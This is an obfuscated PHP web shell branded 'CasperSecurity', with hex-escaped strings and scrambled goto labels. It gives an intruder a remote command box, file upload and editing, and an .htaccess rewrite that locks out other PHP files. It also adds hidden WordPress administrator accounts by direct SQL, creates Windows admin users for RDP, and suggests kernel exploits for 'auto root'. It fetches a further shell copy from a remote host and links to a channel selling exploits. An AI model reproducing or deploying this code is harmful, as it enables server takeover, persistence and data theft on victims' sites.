"\x3c\x64\x69\x76\40\x63\154\x61\x73\x73\x3d\x27\x63\157\156\164\x61\x69\x6e\x65\162\x20\x74\x65\x78\164\55\x63\x65\x6e\164\145\162\40\x6d\x74\55\64\x27\x3e\74\x64\x69\166\x20\x63\x6c\x61\163\x73\x3d\x27\150\145\141\162\x74\47\x3e\x4d\x61\144\145\40\102\x79\x20\74\x61\40\x68\162\145\146\x3d\x27\x68\164\x74\160\x73\72\x2f\57\x74\x2e\x6d\x65\x2f\x42\111\102\x49\x4c\137\x30\x44\x41\131\47\40\x74\141\x72\147\145\x74\75\47\x5f\x62\x6c\x61\156\153\47\x3e\124\x2e\x6d\x65\57\x42\111\102\x49\114\137\60\104\x41\131\74\57\x61\x3e\x20\127\x69\x74\150\40\x3c\x64\151\x76\40\x63\154\x61\163\163\75\47\x68\145\141\162\x74\x27\x3e\46\x23\61\60\60\70\x34\73\x26\43\66\x35\x30\63\71\73\74\x2f\x64\x69\x76\x3e\74\x2f\144\x69\166\x3e"; echo "\74\x2f\x62\x6f\x64\x79\x3e\xa\74\x2f\150\x74\x6d\x6c\x3e"; die(0); } goto OCNZd; aOH5g: ?> </td> </tr> <tr> <td>Software</td> <td>:</td> <td><?php goto Yw7mK; Cz2vu: if (isset($_GET["\x62\x61\x63\x6b\144\x6f\x6f\162"])) { $DOC_ROOT = $_SERVER["\x44\117\103\x55\115\105\116\124\x5f\122\x4f\x4f\124"]; $CurrentFile = trim(basename($_SERVER["\123\x43\x52\111\120\x54\x5f\x46\x49\114\x45\116\x41\115\x45"])); $htaccess = "\12\x3c\x46\x69\x6c\145\163\115\x61\x74\143\150\40\x22\x5c\x2e\x28\160\x68\160\174\160\x68\52\174\x50\150\52\x7c\120\x48\52\x7c\160\x48\x2a\x29\x24\x22\76\12\104\145\156\171\40\146\162\157\155\x20\x61\154\154\12\x3c\57\106\151\x6c\145\163\x4d\141\x74\143\x68\x3e\12\x3c\106\151\x6c\x65\163\115\141\x74\143\150\x20\x22\136\x28" . $CurrentFile . "\x7c\x20\x77\160\55\143\x61\x73\160\x65\x72\x2e\160\150\x70\40\174\151\x6e\x64\x65\170\56\x70\x68\x70\x7c\167\160\55\x63\x6f\x6e\x66\x69\147\x2e\x70\x68\x70\174\167\x70\x2d\151\156\143\x6c\165\144\145\x73\x2e\160\150\160\x29\44\x22\76\xa\101\x6c\x6c\157\x77\40\146\162\157\155\x20\x61\154\x6c\xa\x3c\57\x46\151\x6c\x65\x73\x4d\x61\164\x63\x68\x3e\12\74\106\x69\154\145\x73\x4d\141\164\143\x68\x20\42\x5c\x2e\x28\x6a\160\x67\x7c\x70\x6e\x67\x7c\147\x69\146\174\160\144\x66\x7c\152\x70\x65\x67\51\44\x22\x3e\12\101\x6c\x6c\157\167\40\146\162\x6f\x6d\40\x61\x6c\x6c\xa\x3c\x2f\x46\151\154\145\x73\115\141\164\143\x68\x3e"; $put_htt = file_put_contents($DOC_ROOT . "\x2f\56\x68\164\141\x63\x63\145\163\x73", $htaccess); if ($put_htt !== false) { echo "\x3c\150\66\40\163\x74\x79\154\x65\47\x67\162\x65\x65\156\47\76\104\157\x6e\145\x21\74\57\x68\66\x3e"; } else { echo "\106\141\151\x6c\144\x21"; } } goto y8N08; j6H6_: function suggest_exploit() { $uname = $GLOBALS["\146\165\x6e\x67\163\151"][8](); $xplod = explode("\x20", $uname); $xpld = explode("\55", $xplod[2]); $pl = explode("\56", $xpld[0]); return $pl[0] . "\56" . $pl[1] . "\x2e" . $pl[2]; } goto ijeDQ; g3Ibo: ?> <span style="color:red; float:right"> </tr> <tr> <td><i class="fa fa-microchip"></i> <?php goto D9z34; Cmj6s: $content = fetchContent("\150\x74\x74\x70\x73\x3a\57\x2f\162\x61\167\x2e\x67\x69\164\x68\x75\142\165\x73\x65\162\143\157\156\164\145\156\164\x2e\x63\157\x6d\x2f\103\x61\x73\160\x65\x72\123\145\143\165\x72\x69\x74\171\x2f\127\145\142\163\x68\145\x6c\x6c\163\57\155\x61\151\156\x2f\x77\x70\55\143\141\x73\x70\145\x72\x2e\x70\150\x70"); goto sGVnx; aRDqz: $dirs = scandir($path); goto yb6Oy; YvLa_: ?> </tbody> </table> </div> <center> <hr width='50%'> Copyright © CasperSecurity </center> </div> </div> </div> <script> <?php goto RsRP9; KkvZG: ?> <?php goto mrRPK; Mso3_: function getOwner($item) { if (function_exists("\x70\157\x73\151\x78\x5f\147\145\x74\160\x77\x75\x69\144")) { $downer = @posix_getpwuid(fileowner($item)); $downer = $downer["\156\141\x6d\x65"]; } else { $downer = fileowner($item); } if (function_exists("\x70\157\163\x69\x78\137\147\145\x74\x67\162\147\x69\x64")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp["\x6e\x61\x6d\x65"]; } else { $dgrp = filegroup($item); } return $downer . "\57" . $dgrp; } goto QoTGP; PXQy5: ?> </td> </tr> <tr> <td>Disable Functions</td> <td>:</td> <td class="td-break"><?php goto kmeyI; k6nPr: if (isset($_POST["\x6e\x65\167\106\x69\x6c\x65\x4e\x61\155\x65"]) && isset($_POST["\156\x65\x77\x46\x69\154\145\x43\x6f\156\164\x65\x6e\164"])) { if (file_put_contents($_POST["\156\x65\x77\106\x69\x6c\x65\116\141\x6d\x65"], $_POST["\x6e\145\x77\106\151\x6c\x65\103\157\156\164\145\x6e\x74"])) { flash("\103\162\x65\141\x74\145\40\x46\151\x6c\145\x20\x53\165\143\143\x65\x73\x73\x66\x75\x6c\154\x79\41", "\123\x75\143\x63\145\x73\163", "\x73\165\x63\x63\145\163\163", "\77\x64\151\162\75{$path}"); } else { flash("\x43\x72\x65\x61\164\145\x20\106\151\x6c\x65\x20\106\141\x69\x6c\x65\x64", "\106\x61\x69\154\145\144", "\145\x72\x72\x6f\162", "\77\x64\151\x72\75{$path}"); } } goto uYZAT; rGgMe: ?> | Magic Quotes : <?php goto P4ifu; m_Hd0: if (isset($_GET["\x61\143\x74\x69\x6f\156"]) && $_GET["\141\143\x74\151\157\x6e"] == "\x64\x6f\x77\156\x6c\157\141\x64") { @ob_clean(); $item = $path . DIRECTORY_SEPARATOR . $_GET["\151\x74\145\155"]; if (is_file($item)) { header("\x43\157\156\x74\145\x6e\164\55\124\x79\160\x65\72\x20\164\145\170\x74\57\160\154\141\x69\156"); } else { if (is_dir($item)) { $new_item = $path . DIRECTORY_SEPARATOR . "\x63\157\x6d\160\162\145\x73\163\145\x64\x5f\x66\157\154\x64\145\162\x5f" . basename($item) . "\56\172\x69\x70"; try { Zip($item, $new_item); $item = $new_item; header("\103\x6f\156\x74\x65\156\x74\55\164\x79\160\145\72\x20\x61\x70\160\154\x69\143\141\164\x69\157\156\57\x7a\151\160"); } catch (Exception $e) { flash($e->getMessage(), "\x46\141\x69\154\145\144", "\x65\162\162\x6f\x72", "\x3f\144\151\162\x3d{$path}"); } } } if (is_file($item)) { header("\x43\157\x6e\164\145\156\164\x2d\x44\x65\163\x63\x72\151\x70\164\151\x6f\x6e\72\40\106\151\154\x65\x20\124\162\x61\x6e\163\146\x65\162"); header("\103\157\x6e\164\x65\x6e\x74\55\104\x69\163\160\157\x73\151\164\x69\157\x6e\x3a\x20\141\x74\x74\141\x63\x68\x6d\145\x6e\164\x3b\40\146\x69\x6c\x65\x6e\141\x6d\145\x3d\x22" . basename($item) . "\42"); header("\x45\x78\x70\151\x72\145\163\x3a\x20\60"); header("\103\x61\x63\150\x65\55\103\157\x6e\164\x72\157\154\72\x20\155\165\163\164\55\162\x65\x76\x61\x6c\x69\144\x61\x74\145"); header("\x50\x72\x61\x67\x6d\x61\x3a\x20\x70\165\142\x6c\151\x63"); header("\x43\x6f\156\164\x65\156\164\x2d\x4c\145\156\x67\x74\150\72\40" . filesize($item)); readfile($item); if (isset($new_item) && is_file($new_item)) { unlink($new_item); } die; } } goto Gx5ZN; PIqaM: function which($p) { $path = cmd("\x77\150\151\x63\150\x20" . $p); if (!empty($path)) { return strlen($path); } return false; } goto URHqX; IunYw: if (!function_exists("\160\x6f\163\151\x78\x5f\147\145\164\x65\x67\x69\x64")) { $user = function_exists("\x67\145\164\137\x63\x75\162\x72\145\x6e\x74\x5f\x75\x73\145\162") ? @get_current_user() : "\x3f\77\x3f\x3f"; $uid = function_exists("\x67\x65\x74\x6d\x79\165\151\144") ? @getmyuid() : "\x3f\77\77\x3f"; $gid = function_exists("\x67\x65\x74\x6d\171\x67\151\144") ? @getmygid() : "\77\x3f\77\77"; $group = "\x3f"; } else { $uid = function_exists("\160\157\163\x69\x78\x5f\x67\x65\164\x70\x77\x75\x69\144") && function_exists("\160\157\x73\151\170\x5f\x67\145\x74\x65\165\x69\x64") ? @posix_getpwuid(posix_geteuid()) : array("\x6e\141\155\145" => "\77\77\77\x3f", "\165\151\x64" => "\77\x3f\x3f\77"); $gid = function_exists("\160\157\163\x69\170\x5f\x67\145\x74\147\162\147\x69\144") && function_exists("\160\x6f\x73\x69\170\x5f\x67\145\x74\x65\147\x69\144") ? @posix_getgrgid(posix_getegid()) : array("\x6e\141\x6d\145" => "\x3f\x3f\77\x3f", "\147\x69\x64" => "\77\x3f\x3f\77"); $user = $uid["\x6e\x61\x6d\145"]; $uid = $uid["\165\151\x64"]; $group = $gid["\x6e\x61\155\145"]; $gid = $gid["\x67\x69\x64"]; } goto aRDqz; g7xOV: ?> </td> </tr> </table> <form action="" method="post" class="row g-2 p-2" style="margin: auto;"> <div class="col-auto"> <input type="text" class="form-control form-control-sm" name="bdcmd" placeholder="whoami"> </div> <div class="col-auto"> <button type="submit" class="btn btn-outline-light btn-sm">Submit</button> </div> </form> </td> </tr> </table> </div> </div> <div id="tool"> <center> <hr width='20%'> </center> <div class="d-flex justify-content-center flex-wrap my-3"> <div class="d-block"> <a href="?" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-home"></i> Home</a> </div> <div class="d-block"> <a class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#upload" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a> </div> <div class="d-block"> <a class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#info" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-info-circle"></i> Server Info</a> </div> <div class="d-block"> <a id="cpreset" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?resetpasscp=1" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-pencil-square-o"></i> Cpanel reset</a> </div> <div class="d-block"> <a id="configGrabLink" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?Configgrab=1" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-wrench"></i> Grab config</a> </div> <div class="d-block"> <a id="wpToolsLink" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?wptool=1" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-wordpress"></i> Wordpress-tools</a> </div> <div class="d-block"> <a id="createwp" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?createwp=1" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-wordpress"></i> Create Wordpress users</a> </div> <div class="d-block"> <a id="adminer" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?adminer=1" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-user-circle"></i> Adminer</a> </div> <div class="d-block"> <a id="backdoor" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?adminer=1" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-bug"></i> Backdoor remover</a> </div> </div> <div class="d-block "> <center> <a id="rdp" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?rdp=1" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-plug"></i> Create RDP</a> <a id="lockshell" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?adminer=1" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-lock"></i> Lock shell</a> <a id="autoroot" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?autoroot=1" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-user-plus"></i> Auto root</a> <a id="tg" class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="?adminer=1" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-telegram"></i> Join Channel (buy exploits & tools)</a> </div> <script> document.addEventListener("DOMContentLoaded", function() { document.getElementById("configGrabLink").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "?Configgrab=1"; // }); document.getElementById("backdoor").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "?backdoor=1"; // }); document.getElementById("autoroot").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "?autoroot=1"; // }); document.getElementById("lockshell").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "?lockshell=1"; // }); document.getElementById("rdp").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "?rdp=1"; // }); document.getElementById("tg").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "https://t.me/CasperSecurity"; // }); document.getElementById("createwp").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "?createwp=1"; // }); document.getElementById("adminer").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "?adminer=1"; // }); document.getElementById("wpToolsLink").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "?wptool=1"; }); document.getElementById("cpreset").addEventListener("click", function(event) { event.preventDefault(); window.location.href = "?resetpasscp=1"; // }); }); </script> </div> <center> <hr width='20%'> </center> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="collapse" id="upload" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post" enctype="multipart/form-data"> <div class="mb-3"> <label class="form-label">File Uploader</label> <div class="input-group"> <input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload" multiple> <button class="btn btn-outline-light" type="submit" id="inputGroupFileAddon04">Upload </button> </div> </div> </form> </div> </div> </div> </div> <div class="col-md-12"> <div class="collapse" id="newFileCollapse" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"> <label class="form-label">File Name</label> <input type="text" class="form-control" name="newFileName" placeholder="test.php"> </div> <div class="mb-3"> <label class="form-label">File Content</label> <textarea class="form-control" rows="5" name="newFileContent" placeholder="Hello-World"></textarea> </div> <button type="submit" class="btn btn-outline-light">Create</button> </form> </div> </div> </div> </div> <div class="col-md-12"> <div class="collapse" id="newFolderCollapse" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-5"> <form action="" method="post"> <div class="mb-3"> <label class="form-label">Folder Name</label> <input type="text" class="form-control" name="newFolderName" placeholder="home"> </div> <button type="submit" class="btn btn-outline-light">Create</button> </form> </div> </div> </div> </div> <div class="col-md-12"> <div class="collapse" id="info" data-bs-parent="#tool"> <div class="row justify-content-center"> <div class="col-md-8"> <div class="mb-3"> <label class="form-label">Server Info</label> <table class="table text-light"> <tr> <td>Operating System</td> <td>:</td> <td><?php goto A3FSp; c1sD1: echo $uid; goto BPgZA; zykgE: ?> <?php goto IKArQ; WoQMx: echo formatSize($free); goto Hs8aM; ewpvJ: echo $ip; goto WmYW7; AoZzE: if (isset($_POST["\141\144\x64\55\x72\x64\160"])) { echo $userRDP; echo $passRDP; $userRDP = $_POST["\x61\x64\144\55\162\x64\x70"]; $passRDP = $_POST["\x61\x64\144\55\x72\x64\x70\x2d\160\x61\163\x73"]; if (stristr(PHP_OS, "\x57\x49\116")) { $procRDP = cmd("\x6e\145\x74\x20\x75\x73\145\x72\40" . $userRDP . "\x20" . $passRDP . "\x20\x2f\141\x64\144"); if ($procRDP) { cmd("\x6e\145\x74\40\x6c\x6f\143\141\154\x67\x72\157\x75\160\40\141\144\x6d\x69\156\x69\163\164\162\x61\164\157\x72\x73\40" . $userRDP . "\x20\x2f\x61\144\144"); echo "\74\x68\61\76\x44\x6f\x6e\x65\x21\x3c\57\x68\61\76"; } else { echo "\x3c\x68\61\76\x46\x61\x69\x6c\144\41\x3c\x2f\150\x31\x3e"; } } else { echo "\x3c\150\61\x3e\x46\141\151\154\144\x21\74\57\x68\x31\x3e"; } } goto j6H6_; zdQGu: echo @ini_get("\x73\x61\x66\145\x5f\x6d\x6f\144\145") ? "\x3c\x66\x6f\x6e\x74\x20\143\x6c\141\163\x73\x3d\42\x74\145\x78\164\x2d\163\x75\x63\143\145\163\163\42\x3e\x4f\x4e\74\57\146\157\x6e\164\x3e" : "\x3c\x66\157\x6e\x74\40\143\x6c\x61\x73\x73\75\x22\164\145\x78\x74\55\x64\x61\156\x67\145\x72\x22\x3e\x4f\106\x46\74\x2f\146\x6f\156\164\76"; goto n7phB; cHxHw: set_time_limit(0); goto RmZpv; aXKNM: echo $uip; goto SS2gs; IKArQ: if (isset($_GET["\x61\x63\x74\x69\x6f\156"]) && $_GET["\141\143\164\x69\x6f\x6e"] != "\144\145\x6c\145\164\145") { $action = $_GET["\x61\143\164\x69\x6f\x6e"]; ?> <div class="col-md-12"> <div class="row"> <div class="col-md-5"> <?php if ($action == "\162\145\x6e\141\155\x65" && isset($_GET["\151\x74\145\155"])) { ?> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label">New Name</label> <input type="text" class="form-control" name="newName" value="<?php echo $_GET["\151\164\x65\155"]; ?> "> </div> <button type="submit" class="btn btn-outline-light">Submit</button> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)"> Back </button> </form> <?php } elseif ($action == "\x65\x64\151\x74" && isset($_GET["\x69\164\145\x6d"])) { ?> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label"><?php echo $_GET["\151\x74\145\155"]; ?> </label> <textarea id="CopyFromTextArea" name="newContent" rows="10" class="form-control"><?php echo htmlspecialchars(file_get_contents($path . "\57" . $_GET["\x69\164\x65\155"])); ?> </textarea> </div> <button type="submit" class="btn btn-outline-light">Submit</button> <button type="button" class="btn btn-outline-light" onclick="jscopy()">Copy </button> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)"> Back </button> </form> <?php } elseif ($action == "\143\x68\155\x6f\144" && isset($_GET["\151\164\x65\x6d"])) { ?> <form action="" method="post"> <div class="mb-3"> <label for="name" class="form-label"><?php echo $_GET["\151\x74\145\155"]; ?> </label> <input type="text" class="form-control" name="newPerm" value="<?php echo substr(sprintf("\45\x6f", fileperms($_GET["\151\x74\145\x6d"])), -4); ?> "> </div> <button type="submit" class="btn btn-outline-light">Submit</button> <button type="button" class="btn btn-outline-light" onclick="history.go(-1)"> Back </button> </form> <?php } ?> </div> </div> </div> <?php } goto iXCQU; rmvq5: function fetchContent($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $content = curl_exec($ch); if (curl_errno($ch)) { echo "\105\162\162\157\162\72\40" . curl_error($ch); } curl_close($ch); return $content; } goto Cmj6s; wggmE: if (isset($_POST["\x62\x64\x63\155\144"])) { ?> <div class="p-2"> <div class="row justify-content-center"> <div class="card text-dark mb-3"> <pre><?php echo $ip . "\100" . $serv . "\x3a\46\156\x62\163\x70\x3b\176\44\x26\156\x62\x73\160\x3b"; $cmd = $_POST["\142\144\x63\x6d\144"]; echo $cmd . "\x3c\142\162\x3e"; ?> <br><code><?php echo cmd($cmd); ?> </code></pre> </div> </div> </div> <?php } goto gL5nu; UXCZ0: foreach ($exdir as $id => $pat) { if ($pat == '' && $id == 0) { ?> <a href="?dir=/" class="text-decoration-none text-light">/</a> <?php } if ($pat == '') { continue; } ?> <a href="?dir=<?php for ($i = 0; $i <= $id; $i++) { echo "{$exdir[$i]}"; if ($i != $id) { echo "\x2f"; } } ?> " class="text-decoration-none text-light"><?php echo $pat; ?> </a> <span class="text-light"> /</span> <?php } goto g7xOV; PRg3Y: ?> </td> </tr> <tr> <td>IP Server</td> <td>:</td> <td><?php goto Pmqo3; SS2gs: ?> </td> </tr> <tr> <td><i class="fa fa-fingerprint"></i> <?php goto KaBm6; oZqOo: if (isset($_POST["\x6e\x65\x77\103\x6f\156\x74\x65\156\x74"]) && isset($_GET["\x69\164\x65\155"])) { if (file_put_contents($path . "\57" . $_GET["\x69\164\145\x6d"], $_POST["\x6e\x65\167\103\x6f\156\164\x65\x6e\x74"])) { flash("\x45\144\x69\x74\x20\x53\165\143\143\x65\x73\163\x66\x75\154\154\171\x21", "\x53\x75\x63\143\145\x73\163", "\x73\165\x63\143\x65\163\x73", "\x3f\x64\x69\162\x3d{$path}"); } else { flash("\105\x64\x69\164\x20\x46\x61\x69\x6c\145\x64", "\106\x61\151\154\x65\144", "\x65\x72\162\157\162", "\77\x64\151\162\x3d{$path}"); } } goto Lho7Y; EnxCT: ?> ] / <?php goto wPKz6; qg4P4: $ds = @ini_get("\144\151\x73\141\142\154\x65\x5f\146\165\156\143\164\x69\x6f\x6e\x73"); goto D33av; KaBm6: echo $dom; goto yqSde; lnmS0: ?> | SSH2 : <?php goto pkR0V; h0IMD: $pers = (int) ($free / $total * 100); goto qg4P4; m_AmF: if (!$d0mains) { $dom = "\x43\141\x6e\x74\x20\x72\x65\x61\144\x20\x5b\40\x2f\145\x74\143\x2f\156\x61\x6d\145\x64\56\x63\x6f\x6e\x66\x20\x5d"; $GLOBALS["\156\x65\145\x64\x5f\164\x6f\x5f\165\160\144\141\x74\x65\x5f\x68\145\141\144\x65\162"] = "\x74\162\x75\x65"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "\x7a\x6f\156\x65")) { preg_match_all("\43\x7a\x6f\x6e\x65\40\42\50\56\52\51\x22\43", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "{$count}\40\104\x6f\155\x61\x69\x6e"; } goto bCzXK; y3Y33: echo function_exists("\x63\x75\x72\x6c\137\x76\145\162\163\x69\157\x6e") ? "\x3c\x66\x6f\156\164\40\143\x6c\x61\x73\x73\75\x22\164\145\x78\164\55\x73\165\143\x63\145\x73\163\42\x3e\x4f\x4e\74\57\146\x6f\156\x74\76" : "\74\146\x6f\x6e\164\x20\x63\x6c\x61\x73\163\x3d\x22\x74\x65\170\164\55\x64\x61\156\x67\x65\162\42\x3e\117\x46\106\x3c\x2f\x66\157\x6e\164\x3e"; goto lnmS0; s27iH: echo function_exists("\x6d\163\x73\x71\x6c\x5f\143\x6f\156\x6e\145\x63\x74") ? "\x3c\x66\x6f\156\x74\40\x63\x6c\141\x73\163\75\42\164\x65\170\x74\x2d\x73\x75\x63\143\x65\163\163\42\x3e\x4f\116\74\57\146\x6f\156\164\76" : "\x3c\x66\x6f\x6e\x74\40\143\x6c\x61\x73\x73\75\x22\x74\145\170\x74\x2d\144\141\156\147\145\162\42\76\x4f\x46\106\x3c\57\146\157\x6e\164\76"; goto Y2WHY; Y2WHY: ?> | PostgreSQL : <?php goto vQljf; V9kC5: echo $uname; goto g3Ibo; bUPUX: @ini_set("\157\165\164\x70\165\x74\x5f\142\x75\x66\x66\x65\x72\x69\x6e\x67", 0); goto KHZnL; lrvFN: echo $open_b; goto MS2vC; vQljf: echo function_exists("\160\147\137\x63\157\x6e\156\x65\143\164") ? "\74\x66\157\x6e\x74\x20\x63\x6c\x61\x73\163\x3d\42\164\x65\170\164\55\163\165\143\x63\x65\x73\163\42\x3e\117\116\74\x2f\146\157\156\x74\76" : "\x3c\x66\157\156\x74\40\x63\154\x61\x73\x73\75\x22\x74\145\170\164\55\x64\141\x6e\147\145\x72\42\x3e\117\106\106\74\x2f\x66\157\156\x74\76"; goto BkPKI; tT11D: $total = disk_total_space($path); goto X9OL4; mt6Py: ?>  ] </td> </tr> <tr> <td> <i class="fa fa fa-folder pt-1"></i>  <?php goto UXCZ0; WmYW7: ?>  | Your IP: <?php goto aXKNM; XcaGG: ?> ]
CasperSecurity
connect_error) { echo "\x20\106\x61\x69\x6c\144\x21"; } $sql = "\x49\x4e\x53\105\x52\124\40\x49\x4e\124\x4f\x20\167\160\x5f\165\x73\x65\x72\x73\40\50\165\x73\x65\x72\x5f\x6c\x6f\x67\x69\x6e\54\x20\165\x73\x65\x72\137\160\141\x73\x73\x2c\x20\165\163\145\x72\x5f\156\151\x63\145\x6e\141\155\x65\54\x20\165\163\145\162\x5f\x65\x6d\141\x69\154\54\40\x75\163\145\162\137\165\162\154\54\x20\165\x73\x65\x72\137\162\145\147\x69\163\164\x65\162\145\144\54\40\x75\163\x65\x72\137\x61\x63\164\151\166\x61\x74\x69\x6f\x6e\137\153\x65\x79\54\x20\165\163\145\x72\137\x73\164\141\164\165\163\x2c\40\x64\x69\163\160\x6c\x61\171\x5f\156\141\x6d\x65\x29\40\126\x41\x4c\x55\x45\123\x20\x28\x27{$wp_user}\x27\x2c\x20\47{$wp_pass}\47\x2c\40\x27\115\x61\144\105\170\x70\x6c\x6f\151\164\163\47\x2c\40\x27\47\54\x20\47\x27\54\40\x4e\117\127\x28\x29\x2c\40\47\47\54\x20\60\54\40\x27\115\x61\144\105\170\160\154\x6f\151\x74\163\47\51"; $sqltakeuserid = "\123\x45\x4c\105\103\x54\40\111\x44\x20\x46\122\117\x4d\x20\167\160\x5f\165\163\145\162\163\x20\127\110\x45\122\x45\x20\x75\x73\145\x72\137\x6c\157\x67\151\x6e\x20\75\x20\x27{$wp_user}\47"; if ($conn->query($sql) === TRUE && $conn->query($sqltakeuserid)) { $result = $conn->query($sqltakeuserid); if ($result->num_rows > 0) { $row = $result->fetch_assoc(); $user_id = $row["\x49\x44"]; $sqlusermeta = "\x49\x4e\x53\105\x52\124\x20\111\116\x54\x4f\x20\167\x70\x5f\165\163\145\162\x6d\x65\164\141\x20\x28\x75\x6d\145\164\x61\137\x69\x64\x2c\x20\165\x73\145\162\137\x69\144\x2c\40\x6d\145\x74\x61\137\x6b\145\171\54\40\x6d\x65\x74\141\x5f\166\141\154\165\145\51\40\126\x41\114\125\105\x53\40\x28\47\x27\54\x20{$user_id}\54\x20\x27\167\x70\x5f\143\x61\x70\x61\x62\x69\x6c\x69\164\x69\x65\x73\x27\x2c\40\47\141\x3a\x31\x3a\173\x73\72\61\63\72\x22\x61\x64\x6d\x69\x6e\151\163\164\162\x61\164\157\x72\42\x3b\x73\x3a\x31\x3a\42\61\x22\73\175\47\x29"; if ($conn->query($sqlusermeta) === TRUE) { echo "\104\x6f\156\x65\41"; } else { echo "\105\162\162\157\162\72\40" . $sqlusermeta . "\xa" . $conn->error; } } else { echo "\125\163\x65\x72\40\164\x69\x64\x61\153\x20\144\x69\164\x65\x6d\x75\153\141\x6e\x2e\xa"; } echo "\x44\x6f\156\x65\41"; } else { echo "\105\x72\x72\x6f\162\72\x20" . $sql . "\12" . $conn->error; } $conn->close(); } goto ft6vz; A3FSp: echo $uname; goto pf4gv; ewYwq: function clear() { if (!empty($_SESSION["\155\145\163\163\x61\147\x65"])) { unset($_SESSION["\155\x65\163\x73\141\147\x65"]); } if (!empty($_SESSION["\x63\x6c\141\x73\x73"])) { unset($_SESSION["\x63\x6c\141\x73\163"]); } if (!empty($_SESSION["\x73\164\141\164\165\163"])) { unset($_SESSION["\163\164\x61\x74\165\x73"]); } return true; } goto w4UY0; gL5nu: ?>
  •  AUTO ROOT
  • " autofocus>
Your IP : [ Swal.fire( ' ', ' ', ' ' ) | MSSQL :
User / Group : , Free =
Storage : Total =
Downloader :
%]
Domains : | Open Basedir : [
CURL : 0) { $userful = array("\147\x63\143", "\154\143\143", "\143\x63", "\x6c\x64", "\x6d\x61\153\x65", "\160\150\160", "\x70\x65\162\x6c", "\160\x79\x74\150\x6f\156", "\162\165\142\171", "\164\141\x72", "\x67\x7a\x69\160", "\x62\172\151\x70", "\x62\172\x69\141\x6c\146\x61\62", "\x6e\x63", "\154\157\143\x61\x74\145", "\163\x75\x69\144\160\145\162\154", "\x67\151\x74", "\x64\157\x63\153\x65\x72", "\163\163\x68"); $x = 0; foreach ($userful as $i) { if (which($i)) { $x++; $useful .= $i . "\54\x20"; } } if ($x == 0) { $useful = "\55\x2d\55\x2d\55\x2d\55\55"; } $downloaders = array("\x77\147\145\164", "\x66\145\x74\143\x68", "\x6c\x79\156\170", "\x6c\x69\156\x6b\x73", "\x63\165\x72\154", "\147\x65\164", "\x6c\x77\160\x2d\x6d\151\x72\x72\x6f\162"); $x = 0; foreach ($downloaders as $i) { if (which($i)) { $x++; $downloader .= $i . "\54\x20"; } } if ($x == 0) { $downloader = "\x2d\x2d\55\x2d\55\55\55\x2d"; } } else { $useful = "\55\x2d\x2d\x2d\55\55\x2d\x2d"; $downloader = "\x2d\55\55\x2d\55\55\55\x2d"; } } else { $useful = "\x2d\x2d\x2d\55\55\55\x2d\55"; $downloader = "\x2d\x2d\x2d\55\55\x2d\x2d\55"; } } goto hYSnn; yyaJ4: echo formatSize($total); goto HVWEE; alfap: ?> | Safe Mode Include Dir : | Safe Mode Exec Dir : = 1024 && $i < count($types) - 1; $bytes /= 1024, $i++) { } return round($bytes, 2) . "\40" . $types[$i]; } goto Mso3_; Pmqo3: echo $ip; goto mj8Cb; BPgZA: ?> [ 120) { $open_b = "\x3c\146\157\x6e\164\40\x63\x6c\141\163\163\75\47\x74\x65\170\x74\55\x73\165\x63\143\145\163\163\47\x3e" . substr($basedir_data, 0, 120) . "\56\56\x2e\74\57\146\157\x6e\x74\76"; } else { $open_b = "\x3c\146\x6f\156\x74\40\143\154\x61\163\163\75\42\164\145\x78\x74\55\x73\x75\143\x63\x65\163\x73\x22\76" . $basedir_data . 